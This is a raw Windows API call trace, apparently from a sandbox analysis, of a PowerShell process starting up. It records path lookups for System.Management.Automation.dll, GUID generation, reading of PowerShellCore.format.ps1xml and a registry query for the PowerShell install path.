	[0785.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.561] VirtualQuery (in: lpAddress=0x1eb810, lpBuffer=0x1ec6d0, dwLength=0x30 | out: lpBuffer=0x1ec6d0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0785.562] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x7c417f, Data2=0x5e50, Data3=0x44f9, Data4=([0]=0xb8, [1]=0xca, [2]=0xae, [3]=0xf9, [4]=0xdf, [5]=0xff, [6]=0xc6, [7]=0x4e))) returned 0x0
	[0785.563] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xf4aa73f6, Data2=0xee4e, Data3=0x41f3, Data4=([0]=0x90, [1]=0x86, [2]=0x2f, [3]=0xe7, [4]=0x11, [5]=0xaf, [6]=0x65, [7]=0xf6))) returned 0x0
	[0785.565] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xefc55118, Data2=0x5410, Data3=0x41c5, Data4=([0]=0xaf, [1]=0x68, [2]=0x3c, [3]=0x43, [4]=0xc8, [5]=0x47, [6]=0x6e, [7]=0x66))) returned 0x0
	[0785.566] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x7f3eddb1, Data2=0x375, Data3=0x4e14, Data4=([0]=0x84, [1]=0x96, [2]=0x79, [3]=0xdd, [4]=0xeb, [5]=0x57, [6]=0x8d, [7]=0xdc))) returned 0x0
	[0785.566] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xd9abae99, Data2=0x20bd, Data3=0x4a4b, Data4=([0]=0xa3, [1]=0xe7, [2]=0xf8, [3]=0xdb, [4]=0xdd, [5]=0xcd, [6]=0x8d, [7]=0xb7))) returned 0x0
	[0785.566] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x544c1127, Data2=0xbf4e, Data3=0x4487, Data4=([0]=0xb5, [1]=0x5a, [2]=0xbd, [3]=0x19, [4]=0x52, [5]=0xaa, [6]=0xc, [7]=0xac))) returned 0x0
	[0785.567] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xc88fa19b, Data2=0x3e5, Data3=0x433c, Data4=([0]=0x81, [1]=0x13, [2]=0xd9, [3]=0x7e, [4]=0x7a, [5]=0x63, [6]=0xac, [7]=0xf3))) returned 0x0
	[0785.567] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xf008448f, Data2=0xa77d, Data3=0x4848, Data4=([0]=0x93, [1]=0x99, [2]=0x6a, [3]=0x8d, [4]=0xee, [5]=0x38, [6]=0xf9, [7]=0x6a))) returned 0x0
	[0785.567] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xcee28a52, Data2=0xe9ad, Data3=0x43f9, Data4=([0]=0x80, [1]=0x49, [2]=0x31, [3]=0x9d, [4]=0x5f, [5]=0xc8, [6]=0xed, [7]=0xa))) returned 0x0
	[0785.567] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x5da8015d, Data2=0xb98c, Data3=0x4c07, Data4=([0]=0xa0, [1]=0x4b, [2]=0x22, [3]=0x2d, [4]=0x80, [5]=0x6f, [6]=0x47, [7]=0x2e))) returned 0x0
	[0785.568] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x924a48c1, Data2=0x40aa, Data3=0x4209, Data4=([0]=0xb1, [1]=0x65, [2]=0x3e, [3]=0x31, [4]=0x1b, [5]=0xea, [6]=0x3b, [7]=0x1e))) returned 0x0
	[0785.569] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x31ce718f, Data2=0x4083, Data3=0x490f, Data4=([0]=0xad, [1]=0x8c, [2]=0xf0, [3]=0x79, [4]=0x43, [5]=0x5, [6]=0x5e, [7]=0x12))) returned 0x0
	[0785.570] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x9f70b18f, Data2=0x6eda, Data3=0x45c9, Data4=([0]=0x85, [1]=0x63, [2]=0x53, [3]=0xd6, [4]=0x5e, [5]=0x60, [6]=0xc, [7]=0x80))) returned 0x0
	[0785.571] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xfe2209e7, Data2=0xf9c7, Data3=0x40c2, Data4=([0]=0xa6, [1]=0xa3, [2]=0x4a, [3]=0xd8, [4]=0x6, [5]=0x77, [6]=0x10, [7]=0xd7))) returned 0x0
	[0785.571] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x1cab0c3e, Data2=0x2d4e, Data3=0x4223, Data4=([0]=0x85, [1]=0x97, [2]=0x11, [3]=0x58, [4]=0x30, [5]=0x6b, [6]=0x1b, [7]=0xf4))) returned 0x0
	[0785.571] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x64c34088, Data2=0x60f7, Data3=0x4c3e, Data4=([0]=0x83, [1]=0x9e, [2]=0xcf, [3]=0x13, [4]=0x59, [5]=0x66, [6]=0x6f, [7]=0x6c))) returned 0x0
	[0785.571] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xfa9dc9ca, Data2=0xe600, Data3=0x416f, Data4=([0]=0xaa, [1]=0xb, [2]=0x15, [3]=0x8d, [4]=0x16, [5]=0xf6, [6]=0x4b, [7]=0xf9))) returned 0x0
	[0785.572] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x73ac31bf, Data2=0xd2ea, Data3=0x4dda, Data4=([0]=0xab, [1]=0x75, [2]=0x34, [3]=0x9a, [4]=0xb, [5]=0x27, [6]=0xdf, [7]=0xc7))) returned 0x0
	[0785.572] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x45b7e490, Data2=0xeaee, Data3=0x4ce5, Data4=([0]=0x80, [1]=0x97, [2]=0xcc, [3]=0x6, [4]=0x66, [5]=0x6b, [6]=0x46, [7]=0x61))) returned 0x0
	[0786.465] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x756f48eb, Data2=0xd1b0, Data3=0x48dc, Data4=([0]=0xab, [1]=0x7, [2]=0xdc, [3]=0x25, [4]=0x20, [5]=0x33, [6]=0xe9, [7]=0x3f))) returned 0x0
	[0786.465] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x73c3a5f8, Data2=0xf4ed, Data3=0x4bd9, Data4=([0]=0xae, [1]=0x49, [2]=0x83, [3]=0xc2, [4]=0x0, [5]=0x78, [6]=0x6c, [7]=0x7f))) returned 0x0
	[0786.465] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0786.465] GetFileType (hFile=0x314) returned 0x1
	[0786.465] SetErrorMode (uMode=0x1) returned 0x1
	[0786.465] GetFileType (hFile=0x314) returned 0x1
	[0786.465] ReadFile (in: hFile=0x314, lpBuffer=0x3152568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3152568*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0786.466] ReadFile (in: hFile=0x314, lpBuffer=0x3152568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3152568*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0786.466] ReadFile (in: hFile=0x314, lpBuffer=0x3152568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3152568*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0786.466] ReadFile (in: hFile=0x314, lpBuffer=0x3152568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3152568*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0786.466] ReadFile (in: hFile=0x314, lpBuffer=0x3152568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3152568*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0786.467] ReadFile (in: hFile=0x314, lpBuffer=0x3152568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3152568*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0786.467] ReadFile (in: hFile=0x314, lpBuffer=0x3152568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3152568*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0786.467] ReadFile (in: hFile=0x314, lpBuffer=0x3152568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3152568*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0786.467] ReadFile (in: hFile=0x314, lpBuffer=0x3152568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3152568*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0786.468] ReadFile (in: hFile=0x314, lpBuffer=0x3152568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3152568*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0786.468] ReadFile (in: hFile=0x314, lpBuffer=0x3152568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3152568*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0786.468] ReadFile (in: hFile=0x314, lpBuffer=0x3152568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3152568*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0786.469] ReadFile (in: hFile=0x314, lpBuffer=0x3152568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3152568*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0786.469] ReadFile (in: hFile=0x314, lpBuffer=0x3152568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3152568*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0786.469] ReadFile (in: hFile=0x314, lpBuffer=0x3152568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3152568*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0786.469] ReadFile (in: hFile=0x314, lpBuffer=0x3152568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3152568*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0786.469] ReadFile (in: hFile=0x314, lpBuffer=0x3152568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3152568*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0786.495] ReadFile (in: hFile=0x314, lpBuffer=0x3152568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3152568*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0786.496] ReadFile (in: hFile=0x314, lpBuffer=0x3152568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3152568*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0786.496] ReadFile (in: hFile=0x314, lpBuffer=0x3152568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3152568*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0786.496] ReadFile (in: hFile=0x314, lpBuffer=0x3152568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3152568*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0786.497] ReadFile (in: hFile=0x314, lpBuffer=0x3152568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3152568*, lpNumberOfBytesRead=0x1ecd38*=0xe67, lpOverlapped=0x0) returned 1
	[0786.497] ReadFile (in: hFile=0x314, lpBuffer=0x3151b37, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3151b37*, lpNumberOfBytesRead=0x1ecd38*=0x0, lpOverlapped=0x0) returned 1
	[0786.497] ReadFile (in: hFile=0x314, lpBuffer=0x3152568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3152568*, lpNumberOfBytesRead=0x1ecd38*=0x0, lpOverlapped=0x0) returned 1
	[0786.497] CloseHandle (hObject=0x314) returned 1
	[0786.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0786.497] SetErrorMode (uMode=0x1) returned 0x1
	[0786.498] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecce0 | out: lpFileInformation=0x1ecce0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0786.498] SetErrorMode (uMode=0x1) returned 0x1
	[0786.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0786.498] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecdc8 | out: phkResult=0x1ecdc8*=0x314) returned 0x0
	[0786.498] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd4c, lpData=0x0, lpcbData=0x1ecd48*=0x0 | out: lpType=0x1ecd4c*=0x1, lpData=0x0, lpcbData=0x1ecd48*=0x56) returned 0x0
	[0786.498] CoTaskMemAlloc (cb=0x5a) returned 0x47ed70
	[0786.498] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd1c, lpData=0x47ed70, lpcbData=0x1ecd18*=0x56 | out: lpType=0x1ecd1c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecd18*=0x56) returned 0x0
	[0786.498] CoTaskMemFree (pv=0x47ed70) 
	[0786.499] RegCloseKey (hKey=0x314) returned 0x0
	[0786.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0786.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0786.500] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x693859c0, Data2=0xc0f0, Data3=0x489e, Data4=([0]=0x86, [1]=0x35, [2]=0x37, [3]=0x19, [4]=0x70, [5]=0x2e, [6]=0xd8, [7]=0xc4))) returned 0x0
	[0786.501] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xfeaa629b, Data2=0x1b3d, Data3=0x459e, Data4=([0]=0xb0, [1]=0xb8, [2]=0xf7, [3]=0xb5, [4]=0x29, [5]=0x9e, [6]=0xcf, [7]=0x2d))) returned 0x0
	[0786.501] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x9bf1d0b0, Data2=0x6411, Data3=0x4290, Data4=([0]=0xaa, [1]=0x2f, [2]=0xfc, [3]=0x5c, [4]=0xf6, [5]=0x35, [6]=0x73, [7]=0x64))) returned 0x0
	[0786.501] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x3d4a9973, Data2=0x2afa, Data3=0x44a1, Data4=([0]=0x97, [1]=0x58, [2]=0x32, [3]=0xd, [4]=0x38, [5]=0x3, [6]=0xb3, [7]=0x60))) returned 0x0
	[0786.501] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xefc0d17d, Data2=0x7b2f, Data3=0x41de, Data4=([0]=0x89, [1]=0xa7, [2]=0xad, [3]=0xe7, [4]=0xd5, [5]=0xaa, [6]=0x7, [7]=0xd0))) returned 0x0
	[0786.501] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x79a446fc, Data2=0xcac3, Data3=0x41b9, Data4=([0]=0xa9, [1]=0x79, [2]=0xa9, [3]=0xc6, [4]=0x63, [5]=0x91, [6]=0x4b, [7]=0x1f))) returned 0x0
	[0786.501] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x743a9358, Data2=0x5d6e, Data3=0x4c8c, Data4=([0]=0x97, [1]=0x6f, [2]=0xd6, [3]=0x70, [4]=0x5b, [5]=0x0, [6]=0x27, [7]=0xf0))) returned 0x0
	[0786.501] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x4abe3202, Data2=0x4c62, Data3=0x4bdd, Data4=([0]=0xbb, [1]=0xaf, [2]=0xe6, [3]=0xa4, [4]=0x1c, [5]=0xf3, [6]=0x4a, [7]=0xc1))) returned 0x0
	[0786.502] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xf4d1235d, Data2=0x347f, Data3=0x44c5, Data4=([0]=0xa3, [1]=0xd5, [2]=0x2, [3]=0xa9, [4]=0x68, [5]=0xbb, [6]=0xa4, [7]=0xc2))) returned 0x0
	[0786.502] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xfb49bd7b, Data2=0xb84d, Data3=0x46d9, Data4=([0]=0x81, [1]=0x43, [2]=0x3e, [3]=0x9, [4]=0x6e, [5]=0x7, [6]=0x7a, [7]=0xf7))) returned 0x0
